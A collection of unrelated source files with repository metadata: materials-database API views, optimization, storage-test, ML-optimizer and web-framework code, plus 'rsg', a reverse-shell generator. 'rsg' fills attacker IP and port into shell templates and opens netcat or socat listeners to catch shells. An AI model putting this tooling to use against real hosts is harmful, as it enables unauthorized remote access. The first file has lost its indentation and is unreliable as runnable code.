db8a450a5708aac63aa39e104745b5cb0a4fa930
|
dede5bdf4aa3ea1187a7bc273e86336c24aadb25
|
refs/heads/master
| 2023-01-24T17:18:48.335699
| 2022-08-23T01:12:29
| 2022-08-23T01:12:29
| 18,248,720
| 124
| 65
|
MIT
| 2023-01-11T02:04:51
| 2014-03-29T19:18:53
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 10,034
|
py
|
optimade_api.py
|
from rest_framework import generics
import django_filters.rest_framework
from qmpy.web.serializers.optimade import OptimadeStructureSerializer
from qmpy.materials.formation_energy import FormationEnergy
from qmpy.materials.entry import Composition
from qmpy.models import Formation
from qmpy.utils import query_to_Q, parse_formula_regex
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.response import Response
from rest_framework.renderers import JSONRenderer, BrowsableAPIRenderer
from rest_framework_xml.renderers import XMLRenderer
from rest_framework_yaml.renderers import YAMLRenderer
from qmpy.rester import qmpy_rester
from django.http import HttpResponse, JsonResponse
from collections import OrderedDict
from qmpy.utils import oqmd_optimade as oqop
import time
import datetime
BASE_URL = qmpy_rester.REST_OPTIMADE
class OptimadeStructureDetail(generics.RetrieveAPIView):
queryset = FormationEnergy.objects.filter(fit="standard")
serializer_class = OptimadeStructureSerializer
renderer_classes = [JSONRenderer, XMLRenderer, YAMLRenderer, BrowsableAPIRenderer]
def retrieve(self, request, *args, **kwargs):
structure_id = request.path.strip("/").split("/")[-1]
self.queryset = self.queryset.filter(id=structure_id)
instance = self.get_object()
serializer = self.get_serializer(instance)
_data = [serializer.data]
data = []
for _item in _data:
item = OrderedDict([("id", _item["id"]), ("type", _item["type"])])
del _item["id"]
del _item["type"]
item["attributes"] = _item
data.append(item)
_data = serializer.data
data = OrderedDict([("id", _data["id"]), ("type", _data["type"])])
del _data["id"]
del _data["type"]
data["attributes"] = _data
full_url = request.build_absolute_uri()
representation = full_url.replace(BASE_URL, "")
time_now = time.time()
time_stamp = datetime.datetime.fromtimestamp(time_now).strftime(
"%Y-%m-%d %H:%M:%S"
)
meta_list = [
(
"query",
{
"representation": representation,
},
),
("api_version", "1.0.0"),
("time_stamp", time_stamp),
("data_returned", 1),
("data_available", Formation.objects.filter(fit="standard").count()),
("more_data_available", False),
(
"provider",
OrderedDict(
[
("name", "OQMD"),
("description", "The Open Quantum Materials Database"),
("prefix", "oqmd"),
("homepage", "http://oqmd.org"),
]
),
),
("warnings", []),
("response_message", "OK"),
]
return Response(
OrderedDict(
[
(
"links",
OrderedDict(
[
("next", None),
("previous", None),
(
"base_url",
{
"href": BASE_URL,
"meta": {"_oqmd_version": "1.0"},
},
),
]
),
),
("resource", {}),
("data", data),
("meta", OrderedDict(meta_list)),
]
)
)
class OptimadePagination(LimitOffsetPagination):
default_limit = 50
offset_query_param = "page_offset"
limit_query_param = "page_limit"
def get_paginated_response(self, page_data):
_data = page_data["data"]
data = []
for _item in _data:
item = OrderedDict([("id", _item["id"]), ("type", _item["type"])])
del _item["id"]
del _item["type"]
item["attributes"] = _item
data.append(item)
request = page_data["request"]
full_url = request.build_absolute_uri()
representation = full_url.replace(BASE_URL, "")
time_now = time.time()
time_stamp = datetime.datetime.fromtimestamp(time_now).strftime(
"%Y-%m-%d %H:%M:%S"
)
_oqmd_final_query = (
page_data["meta"]["django_query"]
if "django_query" in page_data["meta"]
else None
)
_warnings = (
page_data["meta"]["warnings"] if "warnings" in page_data["meta"] else []
)
if (not _warnings) and (not _oqmd_final_query):
_warnings = [
{
"type": "warning",
"detail": "_oqmd_NoFilterWarning: No filters were provided in the query",
}
]
meta_list = [
(
"query",
{
"representation": representation,
"_oqmd_final_query": _oqmd_final_query,
},
),
("api_version", "1.0.0"),
("time_stamp", time_stamp),
(
"_oqmd_data_in_response",
min(
self.get_limit(request),
self.count - self.get_offset(request),
),
),
("data_returned", self.count),
("data_available", Formation.objects.filter(fit="standard").count()),
(
"more_data_available",
                (self.get_next_link() is not None) or (self.get_previous_link() is not None),
),
(
"provider",
OrderedDict(
[
("name", "OQMD"),
("description", "The Open Quantum Materials Database"),
("prefix", "oqmd"),
("homepage", "http://oqmd.org"),
]
),
),
("warnings", _warnings),
("response_message", "OK"),
]
return Response(
OrderedDict(
[
(
"links",
OrderedDict(
[
("next", self.get_next_link()),
("previous", self.get_previous_link()),
(
"base_url",
{
"href": BASE_URL,
"meta": {"_oqmd_version": "1.0"},
},
),
]
),
),
("resource", {}),
("data", data),
("meta", OrderedDict(meta_list)),
]
)
)
class OptimadeStructureList(generics.ListAPIView):
serializer_class = OptimadeStructureSerializer
pagination_class = OptimadePagination
renderer_classes = [JSONRenderer, XMLRenderer, YAMLRenderer, BrowsableAPIRenderer]
def get_queryset(self):
fes = FormationEnergy.objects.filter(fit="standard")
fes, meta_info = self.filter(fes)
return (fes, meta_info)
def list(self, request, *args, **kwargs):
query_set, meta_info = self.get_queryset()
page = self.paginate_queryset(query_set)
serializer = self.get_serializer(page, many=True)
page_data = {
"data": serializer.data,
"request": self.request,
"meta": meta_info,
}
return self.get_paginated_response(page_data)
def filter(self, fes):
request = self.request
filters = request.GET.get("filter", False)
if not filters:
meta_data = {
"warnings": [
{
"type": "warning",
"detail": "_oqmd_NoFilterWarning: No filters were provided in the query. Returning all structures",
}
],
}
return fes, meta_data
# shortcut to get all stable phases
filters = filters.replace("stability=0", "stability<=0")
filters = filters.replace("&", " AND ")
filters = filters.replace("|", " OR ")
filters = filters.replace("~", " NOT ")
q, meta_info = query_to_Q(filters)
if not q:
return ([], meta_info)
fes = fes.filter(q)
return (fes, meta_info)
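    # Hedged illustration (not part of the original view): a request such as
    #     ?filter=elements HAS "Al" & nelements=2
    # is rewritten above to
    #     elements HAS "Al" AND nelements=2
    # before being handed to query_to_Q, and a bare stability=0 clause is
    # widened to stability<=0 so that every stable phase is returned.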
def OptimadeInfoData(request):
data = oqop.get_optimade_data("info")
return HttpResponse(data, content_type="application/json")
def OptimadeVersionsData(request):
data = oqop.get_optimade_data("versions")
return HttpResponse(data, content_type="text/plain")
def OptimadeVersionPage(request):
versions = oqop.get_optimade_data("versions").strip().split("\n")[1:]
versions = ["v{}".format(item) for item in versions]
request_version = request.path.strip("/").split("/")[-1]
data = {"query": request.path}
if request_version in versions:
return JsonResponse(data)
else:
data["error"] = "Version not supported"
return JsonResponse({"status": "false", "message": data}, status=553)
def OptimadeLinksData(request):
data = oqop.get_optimade_data("links")
return HttpResponse(data, content_type="application/json")
def OptimadeStructuresInfoData(request):
data = oqop.get_optimade_data("info.structures")
return HttpResponse(data, content_type="application/json")
|
c8d1d2221d5945821791c53b58cc17555fae4076
|
993252f0bab4d37b1ea0f0b9a95dbb96a200808f
|
/dccp/linearize.py
|
eb8fddd47ff7fa558daac20640a128b19dee65dc
|
[] |
no_license
|
cvxgrp/dccp
|
4dba3e8e5c517a7c314a20d6144e2268c4cd61a1
|
c94aba9881e9f39119c1a693a5a752f23cf0d403
|
refs/heads/master
| 2023-06-09T08:50:12.835704
| 2022-07-09T21:22:12
| 2022-07-09T21:22:12
| 55,815,696
| 115
| 29
| null | 2020-12-02T04:47:42
| 2016-04-08T23:28:30
|
Python
|
UTF-8
|
Python
| false
| false
| 3,367
|
py
|
linearize.py
|
__author__ = "Xinyue"
import numpy as np
import cvxpy as cvx
def linearize_para(expr):
"""
    input:
        expr: an expression
    return:
        linear_expr: linearized expression
        zero_order: zero order parameter
        linear_dictionary: {variable: [value parameter, [gradient parameter]]}
        dom: domain
"""
zero_order = cvx.Parameter(expr.shape) # zero order
linear_expr = zero_order
linear_dictionary = {}
for var in expr.variables():
value_para = cvx.Parameter(var.shape)
if var.ndim > 1: # matrix to vector
gr = []
for d in range(var.shape[1]):
g = cvx.Parameter((var.shape[0], expr.shape[0]))
# g = g.T
linear_expr += g.T @ (var[:, d] - value_para[:, d]) # first order
gr.append(g)
linear_dictionary[var] = [value_para, gr]
        else:  # vector to vector
            g = cvx.Parameter((var.shape[0], expr.shape[0]))
            linear_expr += g.T @ (var - value_para)  # first order
            linear_dictionary[var] = [value_para, [g]]
dom = expr.domain
return linear_expr, zero_order, linear_dictionary, dom
def linearize(expr):
"""Returns the tangent approximation to the expression.
Gives an elementwise lower (upper) bound for convex (concave)
expressions. No guarantees for non-DCP expressions.
Args:
expr: An expression.
Returns:
An affine expression.
"""
if expr.is_affine():
return expr
else:
if expr.value is None:
raise ValueError(
"Cannot linearize non-affine expression with missing variable values."
)
tangent = np.real(expr.value) #+ np.imag(expr.value)
grad_map = expr.grad
for var in expr.variables():
if grad_map[var] is None:
return None
complex_flag = False
if var.is_complex() or np.any(np.iscomplex(grad_map[var])):
complex_flag = True
if var.ndim > 1:
temp = cvx.reshape(
cvx.vec(var - var.value), (var.shape[0] * var.shape[1], 1)
)
if complex_flag:
flattened = np.transpose(np.real(grad_map[var])) @ cvx.real(temp) + \
np.transpose(np.imag(grad_map[var])) @ cvx.imag(temp)
else:
flattened = np.transpose(np.real(grad_map[var])) @ temp
tangent = tangent + cvx.reshape(flattened, expr.shape)
elif var.size > 1:
if complex_flag:
tangent = tangent + np.transpose(np.real(grad_map[var])) @ (cvx.real(var) - np.real(var.value)) \
+ np.transpose(np.imag(grad_map[var])) @ (cvx.imag(var) - np.imag(var.value))
else:
tangent = tangent + np.transpose(np.real(grad_map[var])) @ (var - var.value)
else:
if complex_flag:
tangent = tangent + np.real(grad_map[var]) * (cvx.real(var) - np.real(var.value)) \
+ np.imag(grad_map[var]) * (cvx.imag(var) - np.imag(var.value))
else:
tangent = tangent + np.real(grad_map[var]) * (var - var.value)
return tangent
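if __name__ == "__main__":
    # Hedged usage sketch (illustrative, not part of the original module):
    # linearize a convex expression around the current variable value; the
    # returned affine expression is a global lower bound of the original and
    # matches it exactly at the linearization point.
    x = cvx.Variable(2)
    x.value = np.array([1.0, 2.0])
    convex_expr = cvx.sum_squares(x)
    tangent = linearize(convex_expr)
    print("expression value at x:", convex_expr.value)
    print("tangent value at x:", tangent.value)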
|
e27ca211352d0a40f27fc2b34c8d45eaef545999
|
150a7b11cb531f8bc2a045aefcf2ebe1d151efa3
|
/ocs_ci/utility/localstorage.py
|
2f0d3b5f99dc9c65cbea61ac6608db9d95150777
|
[
"MIT"
] |
permissive
|
red-hat-storage/ocs-ci
|
c7ac414e1b86552da0439223dfa9bca39977f31a
|
5e9e504957403148e413326f65c3769bf9d8eb39
|
refs/heads/master
| 2023-08-17T16:19:51.154403
| 2023-08-17T13:27:12
| 2023-08-17T13:27:12
| 179,558,938
| 146
| 210
|
MIT
| 2023-09-14T16:38:44
| 2019-04-04T19:00:02
|
Python
|
UTF-8
|
Python
| false
| false
| 9,040
|
py
|
localstorage.py
|
"""
This module contains local-storage related methods
"""
import json
import logging
import os
import shutil
from distutils.version import LooseVersion
import yaml
from ocs_ci.framework import config
from ocs_ci.ocs import constants, defaults
from ocs_ci.ocs.exceptions import CommandFailed
from ocs_ci.ocs.node import get_nodes
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import csv
from ocs_ci.ocs.resources.packagemanifest import PackageManifest
from ocs_ci.utility.deployment import get_ocp_ga_version
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import clone_repo, get_ocp_version, run_cmd
from ocs_ci.utility.version import get_semantic_version
logger = logging.getLogger(__name__)
def fetch_all_device_paths():
"""
Return all device paths inside worker nodes
Returns:
list : List containing all device paths
"""
path = os.path.join(constants.EXTERNAL_DIR, "device-by-id-ocp")
clone_repo(constants.OCP_QE_DEVICEPATH_REPO, path)
os.chdir(path)
logger.info("Running script to fetch device paths...")
run_cmd("ansible-playbook devices_by_id.yml")
with open("local-storage-block.yaml") as local_storage_block:
local_block = yaml.load(local_storage_block, Loader=yaml.FullLoader)
dev_paths = local_block["spec"]["storageClassDevices"][0]["devicePaths"]
logger.info(f"All devices are {dev_paths}")
os.chdir(constants.TOP_DIR)
shutil.rmtree(path)
return dev_paths
def get_new_device_paths(device_sets_required, osd_size_capacity_requested):
"""
Get new device paths to add capacity over Baremetal cluster
Args:
device_sets_required (int) : Count of device sets to be added
osd_size_capacity_requested (int) : Requested OSD size capacity
Returns:
list : List containing added device paths
"""
ocp_obj = OCP(
kind="localvolume", namespace=config.ENV_DATA["local_storage_namespace"]
)
workers = get_nodes(node_type="worker")
worker_names = [worker.name for worker in workers]
config.ENV_DATA["worker_replicas"] = len(worker_names)
output = ocp_obj.get(resource_name="local-block")
# Fetch device paths present in the current LVCR
cur_device_list = output["spec"]["storageClassDevices"][0]["devicePaths"]
# Clone repo and run playbook to fetch all device paths from each node
path = os.path.join(constants.EXTERNAL_DIR, "device-by-id-ocp")
clone_repo(constants.OCP_QE_DEVICEPATH_REPO, path)
os.chdir(path)
run_cmd("ansible-playbook devices_by_id.yml")
# Filter unused/unallocated device paths
with open("local-storage-block.yaml", "r") as cloned_file:
with open("local-block.yaml", "w") as our_file:
device_from_worker = [1] * config.ENV_DATA["worker_replicas"]
cur_line = cloned_file.readline()
while "devicePaths:" not in cur_line:
our_file.write(cur_line)
cur_line = cloned_file.readline()
our_file.write(cur_line)
cur_line = cloned_file.readline()
            # Add the required number of device paths from each worker node
while cur_line:
if str(osd_size_capacity_requested) in cur_line:
for i in range(len(worker_names)):
if device_from_worker[i] and (str(worker_names[i]) in cur_line):
if not any(s in cur_line for s in cur_device_list):
our_file.write(cur_line)
device_from_worker[i] = device_from_worker[i] - 1
cur_line = cloned_file.readline()
local_block_yaml = open("local-block.yaml")
lvcr = yaml.load(local_block_yaml, Loader=yaml.FullLoader)
new_dev_paths = lvcr["spec"]["storageClassDevices"][0]["devicePaths"]
logger.info(f"Newly added devices are: {new_dev_paths}")
if new_dev_paths:
assert len(new_dev_paths) == (
len(worker_names) * device_sets_required
), f"Current devices available = {len(new_dev_paths)}"
os.chdir(constants.TOP_DIR)
shutil.rmtree(path)
# Return list of old device paths and newly added device paths
cur_device_list.extend(new_dev_paths)
return cur_device_list
def check_local_volume_local_volume_set():
"""
    Function to check if a Local Volume and a Local Volume Set are present or not
Returns:
dict: dict for localvolume and localvolumeset
"""
lv_or_lvs_dict = {}
logger.info("Checking if Local Volume is Present")
if csv.get_csvs_start_with_prefix(
csv_prefix=defaults.LOCAL_STORAGE_OPERATOR_NAME,
namespace=config.ENV_DATA["local_storage_namespace"],
):
ocp_obj = OCP()
command = f"get localvolume local-block -n {config.ENV_DATA['local_storage_namespace']} "
try:
ocp_obj.exec_oc_cmd(command, out_yaml_format=False)
lv_or_lvs_dict["localvolume"] = True
except CommandFailed as ex:
logger.debug(f"Local volume does not exists! Exception: {ex}")
logger.info("No Local volume found")
lv_or_lvs_dict["localvolume"] = False
logger.info("Checking if Local Volume Set is Present")
if csv.get_csvs_start_with_prefix(
csv_prefix=defaults.LOCAL_STORAGE_OPERATOR_NAME,
namespace=config.ENV_DATA["local_storage_namespace"],
):
ocp_obj = OCP()
command = (
f"get {constants.LOCAL_VOLUME_SET} {constants.LOCAL_BLOCK_RESOURCE} "
f"-n {config.ENV_DATA['local_storage_namespace']} "
)
try:
ocp_obj.exec_oc_cmd(command, out_yaml_format=False)
lv_or_lvs_dict["localvolumeset"] = True
except CommandFailed as ex:
logger.debug(f"Local volume Set does not exists! Exception: {ex}")
lv_or_lvs_dict["localvolumeset"] = False
return lv_or_lvs_dict
@retry(AssertionError, 12, 10, 1)
def check_pvs_created(num_pvs_required):
"""
    Verify that at least the required number of PVs were created and are in the Available state
    Args:
        num_pvs_required (int): minimum number of PVs required
    Raises:
        AssertionError: if fewer than the required number of PVs are in the Available state
"""
logger.info("Verifying PVs are created")
out = run_cmd("oc get pv -o json")
pv_json = json.loads(out)
current_count = 0
for pv in pv_json["items"]:
pv_state = pv["status"]["phase"]
pv_name = pv["metadata"]["name"]
logger.info("%s is %s", pv_name, pv_state)
if pv_state == "Available":
current_count = current_count + 1
assert (
current_count >= num_pvs_required
), f"Current Available PV count is {current_count}"
def get_local_volume_cr():
"""
Get localVolumeCR object
Returns:
local volume (obj): Local Volume object handler
"""
ocp_obj = OCP(
kind=constants.LOCAL_VOLUME,
namespace=config.ENV_DATA["local_storage_namespace"],
)
return ocp_obj
@retry(CommandFailed, 5, 30, 1)
def get_lso_channel():
"""
Get the channel to use for installing the local storage operator
Returns:
str: local storage operator channel
"""
ocp_version = get_ocp_version()
# If OCP version is not GA, we will be using the Optional Operators CatalogSource
# This means there are two PackageManifests with the name local-storage-operator
# so we need to also use a selector to ensure we retrieve the correct one
ocp_ga_version = get_ocp_ga_version(ocp_version)
selector = constants.OPTIONAL_OPERATORS_SELECTOR if not ocp_ga_version else None
# Retrieve available channels for LSO
package_manifest = PackageManifest(
resource_name=constants.LOCAL_STORAGE_CSV_PREFIX, selector=selector
)
channels = package_manifest.get_channels()
versions = []
stable_channel_found = False
for channel in channels:
if ocp_version == channel["name"]:
return ocp_version
else:
if channel["name"] != "stable":
versions.append(LooseVersion(channel["name"]))
else:
logger.debug(f"channel with name {channel['name']} found")
stable_channel_found = True
stable_channel_full_version = channel["currentCSVDesc"]["version"]
stable_channel_version = get_semantic_version(
stable_channel_full_version, only_major_minor=True
)
# Ensure versions are sorted
versions.sort()
sorted_versions = [v.vstring for v in versions]
if len(sorted_versions) >= 1:
# Use latest channel
if stable_channel_found:
if stable_channel_version > get_semantic_version(sorted_versions[-1]):
return "stable"
else:
return sorted_versions[-1]
else:
return channels[-1]["name"]
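# Hedged illustration (not part of the original helper): with OCP 4.14 and LSO
# channels named "4.11", "4.12" and "stable", no channel matches the OCP
# version, so the versioned channels are sorted and compared against the
# "stable" channel's CSV version; if "stable" resolves to something newer
# (say 4.13) the function returns "stable", otherwise it returns "4.12".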
|
2b34bce0f50e1f3818115d92e020ca1fdbfc550f
|
444a9480bce2035565332d4d4654244c0b5cd47b
|
/research/cv/simclr/src/optimizer.py
|
485176be72b2869ee33aca7d6c403028e73834cb
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
mindspore-ai/models
|
7ede9c6454e77e995e674628204e1c6e76bd7b27
|
eab643f51336dbf7d711f02d27e6516e5affee59
|
refs/heads/master
| 2023-07-20T01:49:34.614616
| 2023-07-17T11:43:18
| 2023-07-17T11:43:18
| 417,393,380
| 301
| 92
|
Apache-2.0
| 2023-05-17T11:22:28
| 2021-10-15T06:38:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,543
|
py
|
optimizer.py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""optimizer generator"""
from mindspore import nn, Tensor
from .lr_generator import get_lr
def get_train_optimizer(net, steps_per_epoch, args):
"""
generate optimizer for updating the weights.
"""
if args.optimizer == "Adam":
if args.run_distribute:
lr = get_lr(lr_init=1e-4, lr_end=1e-6, lr_max=9e-4,
warmup_epochs=args.warmup_epochs, total_epochs=args.epoch_size,
steps_per_epoch=steps_per_epoch,
lr_decay_mode="linear")
else:
lr = get_lr(lr_init=1e-5, lr_end=1e-7, lr_max=9e-5,
warmup_epochs=args.warmup_epochs, total_epochs=args.epoch_size,
steps_per_epoch=steps_per_epoch,
lr_decay_mode="linear")
lr = Tensor(lr)
decayed_params = []
no_decayed_params = []
for param in net.trainable_params():
if 'beta' not in param.name and 'gamma' not in param.name and 'bias' not in param.name:
decayed_params.append(param)
else:
no_decayed_params.append(param)
group_params = [{'params': decayed_params, 'weight_decay': args.weight_decay},
{'params': no_decayed_params},
{'order_params': net.trainable_params()}]
optimizer = nn.Adam(params=group_params, learning_rate=lr)
else:
raise ValueError("Unsupported optimizer.")
return optimizer
def get_eval_optimizer(net, steps_per_epoch, args):
lr = get_lr(lr_init=1e-3, lr_end=1e-5, lr_max=1e-2,
warmup_epochs=5, total_epochs=args.epoch_size,
steps_per_epoch=steps_per_epoch,
lr_decay_mode="linear")
lr = Tensor(lr)
optimizer = nn.Adam(params=net.trainable_params(), learning_rate=lr)
return optimizer
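# Hypothetical usage sketch (not part of the original module). `net` is any MindSpore
# Cell and `args` is a stand-in namespace carrying the fields read above; both are
# assumptions for illustration only.
#
#     from types import SimpleNamespace
#     args = SimpleNamespace(optimizer="Adam", run_distribute=False,
#                            warmup_epochs=10, epoch_size=100, weight_decay=1e-6)
#     optimizer = get_train_optimizer(net, steps_per_epoch=391, args=args)
#
# Any value other than "Adam" in args.optimizer makes get_train_optimizer raise
# ValueError("Unsupported optimizer.").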
|
7b389bc63538659b70a1f8195a6444947148070e
|
9ed3b16b3da72e4c47a04f2f2e3ef395e9fd9f20
|
/contrib/openjdk17/update.py
|
c61f2e44e7288b82de836abf2244e5957ec61e1c
|
[
"BSD-2-Clause"
] |
permissive
|
chimera-linux/cports
|
fdae59dc25856942be3041e10e3533dbf8f883c3
|
714680161cd719dd047452c95fbb9b447bc23a86
|
refs/heads/master
| 2023-09-03T19:30:40.720670
| 2023-09-03T15:07:40
| 2023-09-03T15:07:40
| 374,000,317
| 118
| 37
|
BSD-2-Clause
| 2023-09-14T20:31:08
| 2021-06-05T02:07:34
|
Python
|
UTF-8
|
Python
| false
| false
| 30
|
py
|
update.py
|
pattern = r">jdk-([\d.]+)-ga"
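# Hedged note (not part of the original file): this pattern is presumably consumed by
# the cports update-check tooling; applied by hand it extracts the version like so:
#
#     import re
#     sample = '<a href="/tags/jdk-17.0.8-ga">jdk-17.0.8-ga</a>'  # made-up input
#     re.findall(r">jdk-([\d.]+)-ga", sample)                     # -> ['17.0.8']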
|
8fbec7887b739ccb3dbeec452eac76a132a01843
|
29b62d060fcb01eca2e319b70f4ca7b5c259d7c4
|
/alita/factory.py
|
f3ae2d11c646dd355b91c73b5efb15f5705a0d33
|
[] |
no_license
|
dwpy/alita
|
eb4d58372b0d9d2988e63656511c61d8d6f88990
|
1d8a1565bc771e5ff16b454147cb44eadd19d237
|
refs/heads/master
| 2021-06-17T20:42:23.402187
| 2019-06-12T08:53:19
| 2019-06-12T08:53:19
| 174,462,948
| 119
| 2
| null | 2021-06-11T17:49:16
| 2019-03-08T03:31:05
|
Python
|
UTF-8
|
Python
| false
| false
| 2,508
|
py
|
factory.py
|
import os
import sys
import importlib
from alita.base import BaseFactory
def prepare_import(path):
"""
Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
if os.path.splitext(path)[1] == '.py':
path = os.path.splitext(path)[0]
if os.path.basename(path) == '__init__':
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, '__init__.py')):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return '.'.join(module_name[::-1])
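# Illustrative example (not part of the original module; the paths are made up): for a
# tree containing /srv/proj/pkg/__init__.py, /srv/proj/pkg/web/__init__.py and
# /srv/proj/pkg/web/app.py, prepare_import('/srv/proj/pkg/web/app.py') walks upward
# until it leaves the package (no __init__.py in /srv/proj), inserts '/srv/proj' at the
# front of sys.path if it is not already there, and returns 'pkg.web.app'.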
class CliFactory:
def load_app(self, app_file=None):
try:
if not app_file:
app_file = os.environ.get('ALITA_APP') or "app.py"
import_name = prepare_import(app_file)
app_module = importlib.import_module(import_name)
return getattr(app_module, 'app')
except SyntaxError as e:
message = (
'Unable to import your app.py file:\n\n'
'File "%s", line %s\n'
' %s\n'
'SyntaxError: %s'
) % (getattr(e, 'filename'), e.lineno, e.text, e.msg)
raise RuntimeError(message)
class AppFactory(BaseFactory):
def __init__(self, app=None):
self.app = app
def create_request_object(self, environ):
from alita.request import Request
return Request(self.app, environ)
def create_base_response_class(self):
from alita.response import HTTPResponse
return HTTPResponse
def create_base_exception_class(self):
from alita.exceptions import HTTPException
return HTTPException
def create_exception_handler_object(self):
from alita.handler import ExceptionHandler
return ExceptionHandler(self.app)
def create_router_object(self):
from alita.routing import Router
return Router(self.app)
def create_static_handler(self):
from alita.handler import StaticHandler
return StaticHandler(self.app)
def create_jinja_loader(self):
from alita.templating import DispatchingJinjaLoader
return DispatchingJinjaLoader(self.app)
|
6904ad10cbc4c211bba7adcc0ad4a73033261a3c
|
00c167b38fc1f6fc6d8a7bbf0b10b2a1a565dd34
|
/rsg
|
4433265b41fd89526af9753212df61249f132a29
|
[
"MIT"
] |
permissive
|
mthbernardes/rsg
|
66772689028d0d2ab36e65fe7aca23d51795fcb9
|
2361cf88b30f9221296dc252f041d936b22dcb9f
|
refs/heads/master
| 2023-05-11T11:22:11.459761
| 2022-04-19T19:06:25
| 2022-04-19T19:06:25
| 113,935,763
| 579
| 137
|
MIT
| 2023-04-27T10:10:55
| 2017-12-12T02:57:07
|
Python
|
UTF-8
|
Python
| false
| false
| 2,376
|
rsg
|
#!/usr/bin/env python3
from sys import argv, exit as exit_code
from os import system, path
from re import findall
from subprocess import check_output
def GREEN(text):
return "\033[32m{}\033[0m".format(str(text))
def usage():
print('''Usage: python3 {} <ip address> <port> [shell type]
Examples:
python3 {} 127.0.0.1 4444
python3 {} 192.168.0.1 443 bash'''.format(argv[0],argv[0],argv[0]))
exit_code(-1)
def verify_ip(ipaddr):
output = check_output(['ip', 'address']).decode()
candidate_ips = [ip for ip in findall(r"(?:\d{1,3}\.){3}\d{1,3}",output) if '255' not in ip]
return ipaddr in candidate_ips
def main():
if len(argv) < 3:
usage()
ipaddr, port = argv[1], argv[2]
if not verify_ip(ipaddr):
print("Invalid IP address! Exiting.")
exit_code(-1)
shells = path.join(path.dirname(path.realpath(__file__)), 'shells.txt')
if len(argv) == 4:
shell_type = argv[3].upper()
else:
shell_type = ''
for shell in open(shells):
desc, cmd = shell.split('|', 1)
cmd = cmd.replace("[IPADDR]", ipaddr)
cmd = cmd.replace("[PORT]", port)
if shell_type in desc:
print(GREEN(desc))
print(cmd)
c = input('Select your payload, press "l" to listen on port {} or enter to exit: '.format(port))
if c == 'l':
if int(port) < 1024:
            if shell_type == 'SOCAT':
                print(shell_type)
                system('sudo socat file:`tty`,raw,echo=0 tcp-listen:{},fork'.format(port))
            # stabilized NC listener (assumed 'NC' shell type; the source had a bare "elif:",
            # a syntax error, and a literal "<port>" where the chosen port is now interpolated)
            elif shell_type == 'NC':
                system('stty raw -echo; (echo \'script -qc "/bin/bash" /dev/null\';echo pty;echo "stty$(stty -a | awk -F \';\' \'{print $2 $3}\' | head -n 1)";echo export PATH=\\$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp;echo export TERM=xterm-256color;echo alias ll=\'ls -lsaht\'; echo clear; echo id;cat) | nc -lvnp ' + port + ' && reset')
            else:
                system('sudo nc -n -v -l -s {} -p {}'.format(ipaddr, port))
else:
if shell_type == 'SOCAT':
print(shell_type)
system('socat file:`tty`,raw,echo=0 tcp-listen:{},fork'.format(port))
else:
system('nc -n -v -l -s {} -p {}'.format(ipaddr, port))
if __name__ == "__main__":
main()
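# Note (not part of the original script): main() assumes each line of shells.txt has the
# form "DESCRIPTION|command template", where the template may contain the literal
# placeholders [IPADDR] and [PORT]; split('|', 1) keeps any further '|' characters as
# part of the command. A made-up entry illustrating the format:
#
#     BASH TCP|bash -i >& /dev/tcp/[IPADDR]/[PORT] 0>&1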
|
|
d81aa736c544dc23b100d36a5ac2a14d005d99f7
|
b8441dc1987be9e64fa3081d456b2a3060ec44d1
|
/mars/tensor/fuse/numexpr.py
|
c4da91f1400efc23f04e55cd226a197a2842b7c8
|
[
"BSD-3-Clause",
"MIT",
"ISC",
"Apache-2.0",
"CC0-1.0",
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mars-project/mars
|
f99fefbce999d58a9249bc72046787a9731c9c73
|
c36c53fa22e10ef9477d9c454401a2f281375f31
|
refs/heads/master
| 2023-07-23T00:23:55.133015
| 2023-07-03T11:44:54
| 2023-07-03T11:44:54
| 160,543,708
| 2,704
| 362
|
Apache-2.0
| 2023-09-11T07:57:35
| 2018-12-05T16:04:03
|
Python
|
UTF-8
|
Python
| false
| false
| 6,225
|
py
|
numexpr.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict
from itertools import count
try:
import numexpr as ne
NUMEXPR_INSTALLED = True
except ImportError:
ne = None
NUMEXPR_INSTALLED = False
import numpy as np
from ..operands import TensorFuse
from .. import arithmetic, reduction
from ..array_utils import as_same_device
from .core import TensorFuseChunkMixin
class TensorNeFuseChunk(TensorFuse, TensorFuseChunkMixin):
_op_type_ = None # no opcode, cannot be serialized
@classmethod
def execute(cls, ctx, op):
chunk = op.outputs[0]
inputs = as_same_device([ctx[c.key] for c in op.inputs], device=op.device)
counter = count()
        # Unify the variable names to V_0, V_1, ... for a better cache hit rate.
key_to_var = defaultdict(lambda: f"V_{counter.__next__()}")
local_dict = {key_to_var[c.key]: i for c, i in zip(op.inputs, inputs)}
expr = _evaluate(chunk).format_map(key_to_var)
# The numexpr.evaluate is thread safe: https://github.com/pydata/numexpr/pull/200
try:
res = ne.evaluate(expr, local_dict=local_dict, global_dict={})
